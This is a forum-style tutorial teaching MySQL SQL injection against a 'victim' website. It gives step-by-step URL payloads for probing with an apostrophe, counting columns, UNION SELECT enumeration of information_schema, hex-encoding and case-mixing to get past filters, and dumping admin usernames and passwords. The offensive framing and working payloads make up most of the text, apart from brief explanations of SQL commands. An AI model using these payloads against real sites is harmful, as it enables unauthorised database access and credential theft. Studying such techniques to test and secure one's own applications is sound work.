[Tutorial] SQL Injection English

First thing, this is my tutorial. If you see this tutorial by someone named Orik or Zebra, this is me.
Second, This is a tutorial i made along time ago, excuse me for my English mistakes.

You need to know SQL, Before starting this tutorial.
If you dont know SQL go Here, and start learning.

SQL Injections.
Chapter 1 – What is SQL Injection?.
SQL Injection, is when you inject a SQL query to the SQL query that is already running.
And then, you can find from the errors information on the database and from the database.

Chapter 2 – Basic SQL Injection
Checking if the Website is vulnerable
First lets fine a victim:
Example:

http://website.com/news.php?id=1

You can see on the Web-Site above that its using a QueryString called id.
So probably the sql query will look something like this:

SELECT * FROM news WHERE id = 1

Now we will put an apostrophe(‚) after the id=1:

http://website.com/news.php?id=1'

So now the query looks like this:

SELECT * FROM news WHERE id = 1'

And its obvious that this query will output an error, because there’s no apostrophe to close the sql query.

if you can’t see an error, it probably mean you can’t SQL Inject the Web-Site.

Checking the amount of columns that the query pull out from the database
First thing on the Injection, is to check how much columns the query pulls out from the database.

Just put „group by 1–“ after the „id=1“.
And then add + 1 till you see an error.
Example:

http://website.com/news.php?id=1 group by 1-- No error
http://website.com/news.php?id=1 group by 2-- No error
http://website.com/news.php?id=1 group by 3-- No error
http://website.com/news.php?id=1 group by 4-- No error
http://website.com/news.php?id=1 group by 5-- Error

That means the query pulls out 4 fields.

Check the displayd fields
The query pulls out all the columns, but usually it display just few of them.

So now we will learn how to check which column are displayd.

In order to do it, we will learn another command: UNION SELECT.
What the command does, is to add another row to the query.

Here we will not choose data from the table, we will insert the data ourselves.

For this command, we count how much columns the query request.

Now remember our goal now, is to check which columns are displayd and which columns aren’t.
In order to do that, we will do two tricks.
1.We will replace the number that in the QueryString „id“ with „-1“, this way nothing will be returned.
2.We will not add values ranodmaly, we will add to each field an concecutive number, this way when we will see a number on the screen, we will know which field is displayd.

In this case we found 4 fields, so we will write the sentence below:

http://website.com/news.php?id=-1 union select 1,2,3,4--

As you noticed, we adding(Just in our screen, not to the real table) data to each field. We separate each field with an comma.

Now what is left for us to do, is to check which values we see on the screen. It doenst matter where, title, comment,name even one number is enough!.
lets assume that you see the number 3. so we know that the 3rd field is displayd.
You will see why it’s useful…

Collecting information on the database
We can collect information on the database with two ways, variables and functions.
Variable: before its name, you put: @@.
Functions: After its name, you put: ().

*Important*
You can mix between capital letters and lowercase letters.
Sometimes a specific word is blockd, and mixing will do the job.
Example: @@VErSIoN.

Version: first thing you need to know before SQLi the website, is the database version.
There are two ways to find it:

@@version
version()

The database name(Most Web-Sites uses more than one database):

database()

The username that the query working on(Each of this functions, return the same result):

user()
current_user()
system_user()
session_user()

Database path(Physical location of the server):

@@datadir

Temporary files folder path:

@@tmpdir

After we found that the 3rd field is displayd on the screen, we will write the code below:

http://website.com/news.php?id=-1 union select 1,2,version(),4--

Now, instead of seeing the number 3, we will see the database version.

Summary
In this chapter, we learned how to check if the Web-Site can be SQL Inject or not, And how to pull out information on the database.

Chapter 3 – Pulling out information from the database
Introduction
Web-Sites that based on MySQL Version 5, have a table named „information_schema“.
In this table, there’s information on all the databases,tables,columns.

Pulling out table names
Usually, the first thing that you do after you know you can pull out information from the database, is to pull out all table names:

http://website.com/news.php?id=-1 union select 1,2,table_name,4 from information_schema.tables where table_schema=database()--

Lets explain the code:
We pulled out the column:“table_name“, from the table:“tables“, that in the database:“information_schema“.
As you noticed, to pull out data from other databases, You write the database name.table name.
Since we want to get only tables from the current database, we added a condition(where) that pull out tables only from the database the current script is using.
At the end we put a „–„, to prevent an error incase the query have more parameters.
When you write „–“ in a query, it makes all the things after it a comment.
There’s another two ways to mark a comment: # and /*.

The command: Limit
At the last part, we explaind how to pull out data from the table, but the result that is displayd on the screen is just the name of the first table.
To display the name of the next table, we will use the command: Limit.
The command limit tells the query which rows from which listing to display.
The command get two parameters, From which row start displaying, And the amout of rows to display.
For example, you add Limit 5,10 to the query, you will make it display 10 rows that starts from the 6 row.
Why from the 6 row? because we start from 0, Example: 1 – second row(0,1), 5 – six row(0,1,2,3,4,5).
Lets notice that in our screen there’s just the 1 result(the first table), so if we wanna pull out row number 6, we will write:

http://website.com/news.php?id=-1 union select 1,2,table_name,4 from information_schema.tables where table_schema=database() Limit 5,1--

The command: group_concat()
as opposed to Limit, the job of group_concat is to pull out all listings in one time:

http://website.com/news.php?id=-1 union select 1,2,group_concat(table_name, 0x3c62723e),4 from information_schema.tables where table_schema=database()--

In the brackets of the command, we put the name of the fields that we want to pull out, and we separate them with a comma.
The command group_concat, displays all the result without any space, so we added another „field“ 0x3c62723e, so we cause that between the results there is a new line. becuase „3c62723e“ is the HEX value of „<br />“.
Remember: if you want to put an HEX value, remember to put a „0x“ before it.
Example: 3c62723e = 0x3c62723e.

The disadvantage of group_concat is, that the command returns until 1024 characters. Like, if ther’s 100 results, So from all the 100 we will get like 30.
but you can always use limit to pull the other 30.

Pull out column names
Ok, so we found the table user/admin, with:

http://website.com/news.php?id=-1 union select 1,2,group_concat(table_name, 0x3c62723e),4 from information_schema.tables where table_schema=database()--

So now we want to find the column names of that table(user/admin):

http://website.com/new.php?id=-1 union select 1,2,group_concat(column_name, 0x3c62723e),4 from information_schema.columns where table_name="admin" and table_schema=database()--

Three things has been changed:
1.The name of the column that we pull out.
2.The name of the table.
3.The condition.

Notice that we pull out all rows, in condition that the column table_name is equals to the string(The string we chose, is a name of a table) admin.
You need to put the string name between the qoutes, but sometimes it will display an error, so we need to change „admin“ to the HEX value of it.
Just go to GoogleBig – Encoder and Decoder Tool (Base64 – Hex – URL – Binary – Rot13 – Md5 – Sha1 – 1337)
And put on the first textbox „admin“ (with the quotes).
Then Copy/Paste the HEX Value of it,and put it after table_name(Remember to had „0x“ at the begining of the HEx Value).
Example: „admin“ HEX Value= 5c2261646d696e5c22:

http://website.com/new.php?id=-1 union select 1,2,group_concat(column_name, 0x3c62723e),4 from information_schema.columns where table_name=0x5c2261646d696e5c22 and table_schema=database()--

Pulling out data
Ok, so imagine we found the table admin columns: username, password.
So now lets pull out the data:

http://website.com/news.php?id=-1 union select 1,2,group_concat(username, 0x3a, password,0x3c62723e),4 from admin--

So now we pulled out the columns username and password from the table admin.
What we will get?
A list of all admin’s usernames and passwords.

You can notice that before, we writed database.table, but now because its the current database, we dont need to write database.table.

Pulling out all databases
Ok, now heres a code that will pull out all databases:

http://website.com/news.php?id=-1 union select 1,2,group_concat(schema_name, 0x3c62723e),4 from information_schema.schemata--

I think this code is very clear.
If you can’t understand it, please read this guide 1 more time, till you can understand it.

MySQL database Version 4
In the MySQL databases version 4, ther isnt the database Information_schema.
So you will need to guess the table,columns. And its sucks…